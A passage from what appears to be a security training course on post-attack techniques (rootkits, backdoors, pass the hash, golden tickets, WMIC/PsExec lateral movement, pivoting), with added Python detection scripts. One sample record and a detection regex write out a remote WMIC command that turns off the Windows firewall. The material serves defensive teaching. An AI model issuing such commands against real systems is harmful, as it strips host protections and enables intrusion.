kernel or a device's firmware to mask just about any type of activity desired. For example, they can
take over the core parts of an OS to hide running processes, services, or files from security
mechanisms like anti-malware and intrusion detection systems (IDSs). In this sense, the rootkit isn't
executing the direct attack, but simply makes way for other malicious code to run undetected. A
Trojan horse by itself may be instantly identified by a real-time anti-malware scanner because it can't
change the OS's fundamental behavior. A rootkit installed beforehand, however, has complete
access to the lowest levels of the OS and can manipulate it into hiding the Trojan from the scanner.
Aside from Trojan horse malware, APTs use rootkits to hide keyloggers, malicious drivers, botnet
controllers, and backdoors. They often rely on convincing privileged users to install the software on
their computers through social engineering tactics.

Rootkits present a challenge to security personnel because they make the lowest level of software
untrusted. You can't be entirely certain a rootkit is gone if you use the very OS it compromised to
scan for it. Some software programs can detect known rootkit signatures, but these are not always
adequate solutions.

Lesson 5: Analyzing Post-Attack Techniques | Topic B


Figure 5-2: Anti-malware software detecting a rootkit.

More on Keylogging

Keyloggers can use rootkits as a persistence vector, but some software-based keyloggers are a component of more surface-level malware like worms and viruses. There are also hardware-based keylogging tools that can enable an attacker to extract a user's keystrokes. These are often implemented as a small device plugged into a host's interface, such as a USB port. These devices incorporate a microcontroller that listens on the data stream between keyboard and CPU, and stores captured keystrokes on the device's memory chip. For an attacker, a hardware keylogger has the advantage of bypassing the OS and firmware and capturing all keystrokes when the computer is powered on. A hardware keylogger may be easy to spot during an inspection of the physical computer, but it can also blend into the physical environment and be difficult for an everyday user to notice.

Backdoors

A backdoor is a way for an attacker to bypass authentication methods to gain access to a system. Backdoors are commonly enabled as part of rootkit behavior—the rootkit hides a running process that grants a remote attacker access to the operating system. Software backdoors are usually just remote control software that opens a channel for the attacker to execute commands through. Using this channel, the attacker can take advantage of the rootkit's elevated privileges and concealment to establish an access point that is hard to detect, much less remove.

APTs will typically install backdoors as part of the attack process, only to truly leverage their potential during the post-attack process, when the organization feels it has successfully recovered from the incident. A successful APT will use the access afforded by the backdoor sparingly; even if the computer itself can't detect the backdoor because of a rootkit, users and security professionals may notice odd behavior that could tip them off. Unexplained slow network speeds and missing or altered files/configurations are usually the signs of stealth access.

Software is not the only backdoor vector that APTs can take. There have been several initiatives by vendors and governments to install backdoors into the manufacturing phase of hardware development. These backdoors enable someone with secret knowledge of them to access any hardware platform that has that particular backdoor. If an APT is able to obtain this knowledge, it could conceivably have unlimited access to a device even when that device's software has been wiped clean. This is very difficult for security professionals to counter, as they are typically not given backdoor access to the hardware they buy, which can put the APT at a major advantage.


Logic Bombs

An APT can automate its post-attack processes by installing logic bombs on a target system. This is useful to the APT because nothing suspicious will happen until the right condition is met, especially if the logic bomb is concealed by a rootkit. So while indiscreet use of a backdoor can make a user suspicious, an effective logic bomb will not.

Logic bombs are typically triggered at a certain time or due to a certain event, whichever the APT configures. An APT can use a logic bomb as a method of misdirection—after an attack, the incident responders may not consider the incident fully eradicated until they carefully monitor the affected systems for several months after the attack. After no further activity is detected, the responders consider the incident closed. However, the logic bomb is still set to go off in the future, and lies dormant on the compromised systems until that date comes.

APTs can use logic bombs with any number of payloads. They can simply make the payload a backdoor, or it can have a more immediate and devastating effect. For example, the logic bomb could wipe an entire drive's worth of sensitive company data, triggering when a specific employee logs in. This not only accomplishes the APT's goal of data destruction, but it can also frame that particular employee as the perpetrator.


Rogue Accounts

Rather than taking the malicious software route, an APT may want to actively try to avoid anti-malware scanners as part of its post-attack process. Rogue accounts present an opportunity for the APT to maintain access while injecting no illegitimate code on the target systems at all. The compromised account is trusted by the operating system in accordance with the privileges it has assigned. On a system with hundreds, or maybe thousands of accounts, any one account can easily get lost in the shuffle.

With this rogue account in place, the attacker may be able to remote into the system and access sensitive information. If the rogue account has sufficient privileges, the APT may be able to change or delete files. As long as the target system is up and running, and remote protocols are active, the APT can gain access at any time it chooses.

How the APT creates or hijacks the rogue account may determine its level of access. If the attackers can socially engineer a privileged user into giving their account credentials, the APT doesn't need to use these credentials directly. After all, even if the user is tricked into giving them out, the user will still probably watch the account for whatever it is the social engineer has promised would happen (e.g., in a quid pro quo). Instead, the APT could use these credentials to create a new account or modify an existing one, give that account a certain amount of privileges, and then let it stay dormant until it's needed. The pitfall for the APT is that most organizations log account creation and use on critical hosts, and an alert could be generated by this activity.

Instructor note: Example CVE ID: CVE-2013-3612.
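The logging point in the last paragraph is where a responder has leverage. As an added example (not part of the course material), the Python script below correlates constructed Windows Security log records of the real event types 4720 (account created) and 4728/4732 (member added to a security-enabled group) and reports accounts created by anyone other than an assumed provisioning account, created outside business hours, or added to a privileged group within half an hour of creation. The event IDs are real; the records, group list, approved provisioning account and thresholds are constructed assumptions.

```python
"""Correlate Windows Security log records to surface rogue account creation.

Added example, not part of the course material. It assumes the events were
exported from the Security log as key/value records; the field names mirror
the real 4720/4728/4732 events, but the records, group names and approved
provisioning account below are constructed.
"""
from datetime import datetime, timedelta

# Real Windows Security event IDs
ACCOUNT_CREATED = 4720          # A user account was created
ADDED_TO_GLOBAL_GROUP = 4728    # A member was added to a security-enabled global group
ADDED_TO_LOCAL_GROUP = 4732     # A member was added to a security-enabled local group

# Constructed environment baseline
PRIVILEGED_GROUPS = {"Administrators", "Domain Admins", "Remote Desktop Users"}
APPROVED_PROVISIONERS = {"svc_hr_provision"}   # accounts allowed to create users
ELEVATION_WINDOW = timedelta(minutes=30)       # create-then-elevate looks like staging
BUSINESS_HOURS = range(7, 19)                  # 07:00-18:59 local time

# Constructed sample export (chronological order is not assumed)
SAMPLE_EVENTS = [
    {"time": "2021-03-02T09:15:00", "id": 4720, "subject": "svc_hr_provision",
     "target": "jsmith", "host": "DC01"},
    {"time": "2021-03-02T23:41:10", "id": 4720, "subject": "kjones",
     "target": "svchelper", "host": "FS02"},
    {"time": "2021-03-02T23:43:55", "id": 4732, "subject": "kjones",
     "target": "svchelper", "group": "Administrators", "host": "FS02"},
    {"time": "2021-03-03T10:02:00", "id": 4720, "subject": "svc_hr_provision",
     "target": "mlee", "host": "DC01"},
    {"time": "2021-03-04T11:30:00", "id": 4728, "subject": "svc_hr_provision",
     "target": "mlee", "group": "Domain Users", "host": "DC01"},
]


def _ts(record):
    return datetime.fromisoformat(record["time"])


def find_rogue_accounts(events):
    """Return (target_account, reason) findings for suspicious account activity."""
    findings = []
    created = {}  # target account -> its 4720 record
    for ev in sorted(events, key=_ts):
        if ev["id"] == ACCOUNT_CREATED:
            created[ev["target"]] = ev
            if ev["subject"] not in APPROVED_PROVISIONERS:
                findings.append((ev["target"],
                                 f"created by non-provisioning account {ev['subject']} on {ev['host']}"))
            if _ts(ev).hour not in BUSINESS_HOURS:
                findings.append((ev["target"], f"created outside business hours at {ev['time']}"))
        elif ev["id"] in (ADDED_TO_GLOBAL_GROUP, ADDED_TO_LOCAL_GROUP):
            if ev.get("group") not in PRIVILEGED_GROUPS:
                continue
            origin = created.get(ev["target"])
            if origin is not None and _ts(ev) - _ts(origin) <= ELEVATION_WINDOW:
                minutes = int((_ts(ev) - _ts(origin)).total_seconds() // 60)
                findings.append((ev["target"],
                                 f"added to {ev['group']} {minutes} min after creation"))
    return findings


if __name__ == "__main__":
    for account, reason in find_rogue_accounts(SAMPLE_EVENTS):
        print(f"{account}: {reason}")
```

Run against the sample, only the account created by kjones late at night and elevated two minutes later is reported; the accounts provisioned by the approved service account during the day produce nothing, which is the signal-to-noise balance a rule like this needs on a host with thousands of accounts.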

ACTIVITY 5-2
Assessing Persistence Techniques

Scenario

You and your team are concerned about possible hidden malware on your client machines left over from an attack. This malware can stealthily wreak havoc on your systems, and is difficult for even standard anti-malware solutions to detect. So, you'll take steps to identify any persistent malicious software on your systems.

1. One of your colleagues suggests using typical anti-malware software like Windows Security to scan for rootkits. Why might this approach not be 100% effective?

A: Answers may vary, but rootkits infect a device at its lowest levels, including being able to alter the fundamental behavior of the operating system itself. Therefore you cannot always trust an anti-malware scan that's running on the operating system to accurately detect a rootkit.

2. From an attacker's perspective, what advantages does using a rogue account for persistent access have over using backdoors?

A: Answers may vary, but rogue accounts, unlike backdoors, do not require malicious software to be installed on the target device. There just needs to be an account configured on the device that has the desired level of access. This helps the attacker evade both manual and automatic anti-malware sweeps.

3. What does the threat profile of a successful APT usually look like?

A: Answers may vary, but APTs are usually launched by multiple experienced cybercriminals, state-sponsored hackers, or other skilled attackers because of the difficulty in remaining stealthy for long periods of time. There are many potential motives behind APTs, including a desire for money and association with a larger group. Likewise, the intent of an APT can vary, though it often centers on theft, espionage, or denial of service.

Instructor note: If necessary, remind students of the different components of a threat profile: actor type, motivation, intent, target, vector, and technique criteria.

TOPIC C
Assess Lateral Movement and Pivoting Techniques

In this topic, you'll assess how attackers can move deeper into your network and systems after they've launched the first salvo of their attack.

Lateral Movement

Lateral movement is the process by which an attacker is able to move from one part of a computing environment to another. Rather than target the deepest parts of an environment immediately, the attacker can gain entry to a more easily accessible endpoint at the perimeter. From there, they can move laterally to different systems without arousing suspicion. Lateral movement can therefore be used as part of an APT, in that the attackers can go from one point to another without tripping any alerts. This is because effective lateral movement is often indistinguishable from legitimate traffic—the attacker does not necessarily direct their attack at specific targets, but stealthily spreads out through the environment, testing various systems for their potential as a vector.

There are several techniques that can enable lateral movement, the most necessary of which is reconnaissance. Once the attacker compromises their patient zero host, they'll need to sweep the network for other hosts, as well as enumerate network protocols, ports, and logical mapping. This provides them with the information they need to discover where exactly they are, and where exactly they can move to. From there, they have several different options available to gain access further into the organization's network and systems.

Instructor note: Example CAPEC ID: CAPEC-564.

Figure 5-3: An attacker starts at a compromised host and moves to other hosts in the network.

Lesson 5: Analyzing Post-Attack Techniques | Topic C


Pass the Hash

Attackers can extend their lateral movement by a great deal if they are able to compromise host credentials. One common credential exploit technique for lateral movement is called pass the hash. This is the process of taking an account's cached credentials when the user is logged in to a single sign-on (SSO) system so the attacker can use the credentials on other systems. An example of the process is as follows:

1. The victim logs in to their Windows computer that is part of a domain using Kerberos SSO authentication. Rather than requiring the victim to enter their password over and over, the SSO authentication caches their credentials as a hash in the Security Accounts Manager (SAM) database on their computer.
2. The attacker gains administrative access to the victim's computer and dumps the SAM database, exposing the hash of the victim's password. In this case, "dumping" the SAM database means to extract the hashes from it using a tool like pwdump, as the SAM database cannot be read directly.
3. The attacker loads this hash onto other computers in the network and authenticates to the SSO system, impersonating the victim.

Instructor note: If necessary, remind students of the Kerberos process.

Figure 5-4: The pass the hash process.

The attacker doesn't even need to crack the hashes—they use them directly to authenticate, making it much easier for them to compromise hosts in the organization. The attacker's access isn't just limited to a single host, as they can pass the hash onto just about any computer in the network that is tied to the domain. This drastically cuts down on the effort the attacker must spend in moving from host to host.
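Because the hash is used rather than cracked, the defender's evidence lies in the logons it produces rather than in the credential itself. The following Python script, added here as an example and not part of the course, scans constructed 4624 logon records for two patterns worth reviewing: one user account completing NTLM network logons (logon type 3) to several hosts within a short window, and a logon type 9 entry via the seclogo logon process on the source workstation, which records a session being given a different set of credentials. Field names follow the real 4624 event; the records, hosts and thresholds are constructed.

```python
"""Flag NTLM logon patterns consistent with pass-the-hash lateral movement.

Added example, not from the course. Field names follow the real 4624 event
(LogonType, AuthenticationPackageName, LogonProcessName, TargetUserName,
WorkstationName); the records and thresholds are constructed sample data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SPREAD_WINDOW = timedelta(minutes=10)  # constructed threshold
SPREAD_HOSTS = 3                       # distinct hosts per account within the window

SAMPLE_LOGONS = [
    # host: computer that logged the event; src: WorkstationName from the event
    {"time": "2021-03-05T14:00:05", "host": "FS01", "user": "bwayne", "src": "WS-044",
     "type": 3, "package": "NTLM", "process": "NtLmSsp"},
    {"time": "2021-03-05T14:01:12", "host": "FS02", "user": "bwayne", "src": "WS-044",
     "type": 3, "package": "NTLM", "process": "NtLmSsp"},
    {"time": "2021-03-05T14:02:40", "host": "SQL01", "user": "bwayne", "src": "WS-044",
     "type": 3, "package": "NTLM", "process": "NtLmSsp"},
    # on the source workstation: a logon with explicit (injected) credentials
    {"time": "2021-03-05T13:58:50", "host": "WS-044", "user": "bwayne", "src": "WS-044",
     "type": 9, "package": "Negotiate", "process": "seclogo"},
    # routine Kerberos network logon from a different user
    {"time": "2021-03-05T14:05:00", "host": "FS01", "user": "ckent", "src": "WS-017",
     "type": 3, "package": "Kerberos", "process": "Kerberos"},
    # machine accounts use NTLM routinely and are excluded from the spread rule
    {"time": "2021-03-05T14:05:30", "host": "FS01", "user": "WS-017$", "src": "WS-017",
     "type": 3, "package": "NTLM", "process": "NtLmSsp"},
]


def _ts(record):
    return datetime.fromisoformat(record["time"])


def is_user_account(name):
    """Exclude computer accounts and the well-known non-user principals."""
    return not name.endswith("$") and name.upper() not in {"ANONYMOUS LOGON", "SYSTEM"}


def ntlm_spread(logons, window=SPREAD_WINDOW, threshold=SPREAD_HOSTS):
    """Accounts that complete NTLM network logons (type 3) to >= threshold hosts inside window.

    Returns {account: sorted list of hosts} for each account that trips the rule."""
    by_user = defaultdict(list)
    for r in logons:
        if r["type"] == 3 and r["package"] == "NTLM" and is_user_account(r["user"]):
            by_user[r["user"]].append((_ts(r), r["host"]))
    findings = {}
    for user, entries in by_user.items():
        entries.sort()
        for i, (start, _) in enumerate(entries):
            hosts = {h for t, h in entries[i:] if t - start <= window}
            if len(hosts) >= threshold:
                findings[user] = sorted(hosts)
                break
    return findings


def explicit_credential_logons(logons):
    """Type 9 (NewCredentials) logons via the seclogo process: a session on the source
    host was given a different set of credentials, a pattern to review alongside the
    NTLM spread from that same host."""
    return [(r["host"], r["user"]) for r in logons
            if r["type"] == 9 and r["process"].lower() == "seclogo"]


if __name__ == "__main__":
    print(ntlm_spread(SAMPLE_LOGONS))
    print(explicit_credential_logons(SAMPLE_LOGONS))
```

Neither rule is conclusive on its own: legitimate administrators and legacy applications still produce NTLM logons, and a type 9 logon is also what a legitimate runas /netonly creates. The value is in the combination, an NTLM fan-out from one workstation that also shows a credential-injection logon moments earlier, which is why both functions return structured results a SIEM correlation can join on host and user.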
Windows Defender Credential Guard

Windows Defender Credential Guard is a feature of Windows 10, Windows Server 2016, and Windows Server 2019 that significantly reduces the efficacy of pass the hash attacks. It uses virtualization techniques to prevent users, even privileged ones, from reading credential data (e.g., hashes) stored in memory. Only a new, isolated process on the system is allowed access to this credential data.

Golden Ticket

A golden ticket, or ticket-granting ticket (TGT), is a Kerberos ticket that has the ability to grant other tickets in an Active Directory environment. Attackers who are able to create a golden ticket can use it to grant administrative access to other domain members, even to domain controllers. This can potentially enable an attacker to compromise the organization's entire forest.

Attackers create golden tickets by gaining access to the krbtgt hash, typically by dumping the Active Directory® (AD) data store. The krbtgt is the trust anchor of the Active Directory domain, fulfilling a similar role as the private key of a root certificate authority. The krbtgt generates TGTs that enable users to access services with Kerberos. With this compromised, the attacker essentially has total control over a domain. An example of the golden ticket attack process is as follows:

1. An attacker gains access to the NTDS.DIT file that contains the Active Directory data store.
2. The attacker dumps the NTDS and identifies the hashes of various administrator accounts, as well as the krbtgt.
3. The incident response team detects the breach and forces Active Directory users to reset their passwords, but they don't reset the krbtgt.
4. The attacker, using the still valid krbtgt hash, uses an exploit module to create a golden ticket for a user in the administrator group. The user doesn't even need to exist in the directory.
5. The attacker uses the golden ticket to assume an administrative identity and compromise the domain controller (DC). From there, the attacker opens a shell onto the DC and executes any administrator-level command they choose.

Note: The term "golden ticket" is usually used to refer to a forged ticket-granting ticket (TGT) rather than a TGT used for its intended purpose.

Figure 5-5: The golden ticket attack process.

A golden ticket attack can enable an attacker to move across an entire forest after the main attack has concluded. Even if the incident response team detects the main attack and contains it, the organization is still susceptible to lateral movement within its various domains.
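Steps 3 and 4 of the process above point to two checks an incident response team can run after containment. As an added example (not course code), the Python below works over constructed exports: it flags 4769 service ticket requests from accounts that do not exist in the directory, or that present an RC4 ticket in a domain configured for AES, and it confirms whether the krbtgt account has been reset twice since containment, which is Microsoft's published guidance because tickets signed with the previous krbtgt key stay valid after a single reset. The encryption type codes and event IDs are real; the user list, ticket and reset records are constructed.

```python
"""Post-containment checks for a lingering golden ticket.

Added example, not the course's own material. It assumes a user list exported
from Active Directory, 4769 (Kerberos service ticket request) records and
4724 (password reset attempt) records exported as dictionaries; all records
below are constructed. Encryption type codes are the values Windows writes to
the TicketEncryptionType field (0x12 = AES256-CTS-HMAC-SHA1-96, 0x17 = RC4-HMAC).
"""
from datetime import datetime

AES256 = 0x12
RC4_HMAC = 0x17

# Constructed directory export (lower-cased sAMAccountName values)
DIRECTORY_USERS = {"jsmith", "mlee", "svc_backup", "administrator"}

# Constructed 4769 records: requests for service tickets, presented with a TGT
SAMPLE_TGS_REQUESTS = [
    {"time": "2021-03-08T08:10:00", "user": "jsmith", "service": "cifs/FS01",
     "etype": AES256, "src": "10.39.5.20"},
    {"time": "2021-03-08T08:12:30", "user": "ghostadmin", "service": "ldap/DC01",
     "etype": RC4_HMAC, "src": "10.39.5.77"},
    {"time": "2021-03-08T08:13:05", "user": "mlee", "service": "cifs/FS01",
     "etype": RC4_HMAC, "src": "10.39.5.31"},
    {"time": "2021-03-08T08:14:00", "user": "administrator", "service": "ldap/DC01",
     "etype": AES256, "src": "10.39.5.10"},
]

# Constructed 4724 records for the krbtgt account
SAMPLE_RESETS = [
    {"time": "2020-11-01T02:00:00", "target": "krbtgt"},   # scheduled, before the incident
    {"time": "2021-03-07T18:30:00", "target": "krbtgt"},   # first post-containment reset
]


def suspicious_ticket_requests(events, directory_users):
    """Return (user, source, reasons) for ticket requests that deserve a closer look."""
    findings = []
    for ev in events:
        reasons = []
        if ev["user"].lower() not in directory_users:
            reasons.append("account does not exist in the directory")
        if ev["etype"] == RC4_HMAC:
            reasons.append("RC4 ticket in an AES domain (legacy client or forged ticket)")
        if reasons:
            findings.append((ev["user"], ev["src"], reasons))
    return findings


def krbtgt_reset_complete(reset_events, containment_time, required=2):
    """True once krbtgt has been reset `required` times after containment.

    Two resets are needed because the KDC still honours tickets signed with the
    previous krbtgt password (Microsoft's published guidance); a single reset
    leaves a forged TGT valid."""
    cutoff = datetime.fromisoformat(containment_time)
    count = sum(1 for ev in reset_events
                if ev["target"].lower() == "krbtgt"
                and datetime.fromisoformat(ev["time"]) > cutoff)
    return count >= required


if __name__ == "__main__":
    for user, src, reasons in suspicious_ticket_requests(SAMPLE_TGS_REQUESTS, DIRECTORY_USERS):
        print(user, src, reasons)
    print("krbtgt reset complete:", krbtgt_reset_complete(SAMPLE_RESETS, "2021-03-07T12:00:00"))
```

The directory check is the strongest of the two, since a ticket for a principal the directory has never heard of has no legitimate explanation; the RC4 check produces false positives from legacy clients and is best treated as a review queue rather than an alert.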
Remote Access Services

Remote access services are a significant part of the lateral movement process. In order to hop from one host to another, the attacker opens a connection between the hosts that provides some measure of control. The protocols and services available to an attacker will influence how they move within a network. For example, an older protocol like Telnet may limit how much control the attacker has on the remote host they're targeting. Protocols like this also need to be installed and enabled on the target machine to function properly. Windows systems, for instance, do not come with Telnet installed.

Aside from simple remote shells like Telnet, attackers may also use graphical remote desktop protocols when available. Protocols like Windows Remote Desktop and Remote Assistance can provide the attacker with access to a target machine from the perspective of a normal, everyday user. Like Telnet, these protocols need to be enabled on the target machine first, which can hamper the attacker's movement. However, when it comes to user workstations, remote desktop services are much more commonly used than command-line shells, so there's a greater likelihood that these services will be enabled and allowed at the firewall.

As you'll see, not all remote access services need to be overtly enabled on the target computer to work.

Figure 5-6: Accessing a remote server using Windows Remote Desktop.

WMIC

The Windows Management Instrumentation Command-line (WMIC) tool provides users with a terminal interface into the operating system's WMI. WMI obtains management information and notifications from both local and remote computers, and enables administrators to run scripts to manage those computers. The latter function is actually WMI's most commonly used—administrators write scripts in a language like VBScript to manage remote hosts over a network. For example, administrators can automate starting and stopping processes on a remote machine. Although the admin could log in to Remote Desktop to start and stop the processes manually, the automated script streamlines this task.

Note: WMI uses the Common Information Model (CIM), an industry standard that defines how devices, applications, and other computer components are represented as related objects.

Because of its ability to manage remote hosts, WMIC can be a vector in post-attack lateral movement. With one host compromised, the attacker can open a channel on other hosts by starting certain processes or stopping processes that interfere with their attack. Using WMIC, the attacker can also assume the identity of another user if they know that user's credentials. This can help the attacker perform tasks that require a higher level of privileges than the default given.

Figure 5-7: Using WMIC to open a network share on a remote server.

Aside from direct control, the attacker can also obtain crucial reconnaissance from a remote host using WMIC. Everything from processes to drive partitions to BIOS data, and more, is information WMI can obtain on the user's behalf.

PsExec

PsExec was developed as an alternative to Telnet and other such remote access services. Whereas Telnet and similar services require the user to set up and install the service on the remote machine, PsExec is designed to be a quicker, more out-of-the-box approach to remote access. Executing the PsExec program from the local machine is all that is required. PsExec also provides more advanced features, such as enabling the administrator to authenticate to remote systems with multiple credentials, rather than just their own. Because it's simple to set up and offers powerful features, PsExec is often favored by administrators looking to quickly manage a remote system.

Likewise, for the same reasons, it's also a popular vector for post-attack movement. For example, assume an attacker has user credentials on their target system, but can't directly access the command line or any GUI interface on the remote machine. In order to move laterally to that machine, they'll need to find some way to open their target up to attack. Using PsExec, they can use a malicious file on their local machine (which they've already compromised), and run that file on the remote machine they're targeting. If this malicious file opens a backdoor, then they can now elevate their privileges and directly control the target system.

Figure 5-8: Using PsExec to run a malicious file on a remote computer that opens port 1111 on the firewall.

Attackers can also use the -s option in PsExec to start processes using the built-in Windows SYSTEM account. The SYSTEM account has complete access to the operating system, even more so than an administrator.

Note: The "Ps" in PsExec refers to the Unix command ps, which lists process information.
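Both WMIC remote process creation and PsExec leave distinctive traces on the target, which is the defender's handle on the two techniques described in this and the preceding WMIC section. The Python below is an added example, not part of the course: it classifies constructed process-creation and service-installation records by four rules: a shell spawned by WmiPrvSE.exe (remote WMI process creation), a child of PSEXESVC.exe or the PSEXESVC service being installed (PsExec), a wmic command line carrying a /node: argument (the source side of a remote call), and the netsh command that turns the firewall off, which is the command used in Activity 5-3. The process and service names are real; the hosts, paths and command lines are constructed.

```python
"""Spot remote WMIC, PsExec and firewall-tampering activity in host telemetry.

Added example, not the course's own material. Records are constructed; their
field names follow Sysmon Event 1 (Image, ParentImage, CommandLine) and the
System log's Event 7045 service-installation record (ServiceName, ImagePath).
PSEXESVC is the service name Sysinternals PsExec installs on the remote host,
and WmiPrvSE.exe is the WMI provider host that spawns processes created through
Win32_Process.Create.
"""
import re

REMOTE_WMI_PARENT = "wmiprvse.exe"
PSEXEC_SERVICE = "psexesvc"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
FIREWALL_OFF = re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)
WMIC_REMOTE = re.compile(r"\bwmic(?:\.exe)?\b.*\s/node:", re.I)

# Constructed telemetry from three hosts (password redacted in the command line)
SAMPLE_EVENTS = [
    {"kind": "process", "host": "WIN10-CLI", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": 'wmic /node:10.39.5.5 /user:Administrator /password:<redacted> process '
            'call create "cmd.exe /c netsh advfirewall set allprofiles state off"'},
    {"kind": "process", "host": "DC01", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmd": "cmd.exe /c netsh advfirewall set allprofiles state off"},
    {"kind": "process", "host": "DC01", "image": r"C:\Windows\System32\netsh.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "netsh advfirewall set allprofiles state off"},
    {"kind": "service", "host": "FS01", "service": "PSEXESVC",
     "image_path": r"C:\Windows\PSEXESVC.exe"},
    {"kind": "process", "host": "FS01", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\PSEXESVC.exe", "cmd": "cmd.exe"},
    {"kind": "process", "host": "WS-017", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": "notepad.exe report.txt"},
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the rule names an event matches (empty list for benign)."""
    hits = []
    if event["kind"] == "service":
        if (event["service"].lower() == PSEXEC_SERVICE
                or PSEXEC_SERVICE in event["image_path"].lower()):
            hits.append("psexec_service_install")
        return hits
    image, parent, cmd = _basename(event["image"]), _basename(event["parent"]), event["cmd"]
    if parent == REMOTE_WMI_PARENT and image in SHELLS:
        hits.append("wmi_remote_shell")        # shell spawned by the WMI provider host
    if parent == PSEXEC_SERVICE + ".exe":
        hits.append("psexec_remote_shell")     # child of the PsExec service
    if WMIC_REMOTE.search(cmd):
        hits.append("wmic_remote_invocation")  # source side of a remote WMI call
    if FIREWALL_OFF.search(cmd):
        hits.append("firewall_disabled")       # the command used in Activity 5-3
    return hits


def triage(events):
    """(host, rules) for every event that matched at least one rule."""
    results = []
    for e in events:
        rules = classify(e)
        if rules:
            results.append((e["host"], rules))
    return results


if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS):
        print(host, rules)
```

Note that the same action appears on both sides: the wmic invocation is logged on the client that issued it, and the resulting shell under WmiPrvSE.exe is logged on the domain controller, so collecting process telemetry from workstations as well as servers is what lets the two be joined. Renaming the PsExec service with its -r option defeats the name match but not the parent-process rule, which is why the example keeps both.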

Pivoting

Pivoting is a process similar to lateral movement. In lateral movement, an attacker hops from one host to another in search of vulnerabilities to exploit. When an attacker pivots, they compromise one host (the pivot) that enables them to spread to other hosts that would otherwise be inaccessible. For example, if you are able to open a shell on a host, you can enter commands in that shell to see other network subnets the host might be connected to. The attacker can move to a different network segment than the one they're already using to connect to the host.

Note: Despite the distinction, lateral movement and pivoting are often used interchangeably.

Port Forwarding

One use for pivoting is port forwarding. In port forwarding, the attacker uses a host as a pivot and is able to access one of its open TCP/IP ports. The attacker then forwards traffic from this port to a port of a host on a different subnet using pivoting methods.

For example, assume the attacker's host (Host A) has compromised another host in the network, Host B. Host B is not their ultimate destination; they want to take control of Host C, which they can't reach directly from their attack machine (perhaps because it's blocked by a firewall). Host B, however, can reach Host C. The attacker knows Host C has Windows Remote Desktop enabled, and wants to exploit that. So:

1. The attacker opens an exploit shell onto Host B and forwards port 3389 to Host C.
2. The attacker then uses their attack machine to connect to Remote Desktop at localhost:3389, which gets forwarded to and opens a remote session on Host C, their ultimate target.

Figure 5-9: An illustration of the port forwarding example.

VPN Pivoting

One type of pivoting attack involves VPN communications. If the attacker is able to compromise a host inside a private network, they can run an exploit payload on that host that starts a VPN client on its network interface. Meanwhile, the attacker runs a VPN server outside the network, and relays frames of data from that server to the client. The data frames are dumped onto the client and can now interface with the wider private network. Any traffic that the client (pivot host) sees can then be relayed back to the attacker's VPN server.

The actual composition of these data frames can vary, but attackers commonly use VPN pivoting to perform reconnaissance of the target network. Once they've established their virtual connection from attacking host to pivot target, the attacker can scan the private network for vulnerabilities and enumerate hosts using the compromised pivot machine. This exposes the network to any number of continued attacks, and the attacker may be able to pivot to mission-critical hosts like a domain controller.

Figure 5-10: Using a VPN to pivot from a compromised host to a domain controller.

SSH Pivoting

After an attacker compromises a host, they can also pivot to other hosts using Secure Shell (SSH) tunnels. The attacker connects to the compromised pivot through SSH using the -D flag. This flag sets up a local proxy server on the attacker's machine, as well as enables port forwarding. Connections to this proxy on the port specified are forwarded to the ultimate target through the pivot. For example, the attacker sets up the proxy on Host A using port 8080. They then SSH into Host B (the pivot), and any traffic sent through port 8080 is forwarded to port 8080 on Host C (the ultimate target).

SSH pivoting enables an attacker to compromise a host they can't reach directly by using an intermediary host (the pivot). The attacker can craft an exploit package to take ownership of the unreachable host. Additionally, the attacker can chain proxy servers together to continue pivoting from host to host, until they reach a DC or another mission-critical host.
Figure 5-11: The firewall blocks direct access to Host C, but the attacker uses SSH to make Host B a pivot.

Routing Tables and Pivoting

After opening a shell on the pivot host, the attacker can also add a new route to the pivot host's routing table. This new route includes a destination subnet and a gateway. The attacker defines the gateway as their own exploit session, so any traffic sent to the subnet must tunnel through the attacker's session. This can enable an attacker to use the pivot as a way to reach different subnets. For example, the attacker's Host A and the compromised pivot (Host B) may be on the 192.168.10.0/24 subnet, whereas the attacker's ultimate target (Host C) is on the 10.39.5.0/24 subnet. The attacker can't see Host C from Host A. Host B, however, can see Host C. If the attacker adjusts Host B's routing tables to add an entry that routes 10.39.5.0/24 traffic through their exploit session, they'll be able to enumerate the hosts on this subnet.
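A route that sends 10.39.5.0/24 through the pivot is visible on the pivot itself, which gives an analyst a simple check. The following Python script is an added example, not course material: it parses the "Active Routes" table printed by the Windows route print command (constructed sample output) and reports any route whose destination, netmask and gateway triple is absent from a constructed baseline for a workstation on 192.168.10.0/24. The output format is that of route print; the addresses and baseline are constructed.

```python
"""Compare a host's active IPv4 routes with a baseline to spot pivot routes.

Added example, not course material. The sample text mimics the "Active Routes"
section printed by the Windows `route print` command; the addresses and the
baseline are constructed around the subnets used in the text (192.168.10.0/24
for Host A and Host B, 10.39.5.0/24 for Host C).
"""

# Constructed capture of `route print` output from the pivot host (Host B)
SAMPLE_ROUTE_PRINT = """\
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0     192.168.10.1   192.168.10.25     25
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
     192.168.10.0    255.255.255.0         On-link     192.168.10.25    281
   192.168.10.255  255.255.255.255         On-link     192.168.10.25    281
        10.39.5.0    255.255.255.0    192.168.10.25   192.168.10.25     26
        224.0.0.0        240.0.0.0         On-link     192.168.10.25    281
===========================================================================
"""

# Constructed baseline: (destination, netmask, gateway) expected on a workstation
# in 192.168.10.0/24. The 10.39.5.0/24 entry is deliberately not part of it.
BASELINE = {
    ("0.0.0.0", "0.0.0.0", "192.168.10.1"),
    ("127.0.0.0", "255.0.0.0", "On-link"),
    ("192.168.10.0", "255.255.255.0", "On-link"),
    ("192.168.10.255", "255.255.255.255", "On-link"),
    ("224.0.0.0", "240.0.0.0", "On-link"),
}


def parse_route_print(text):
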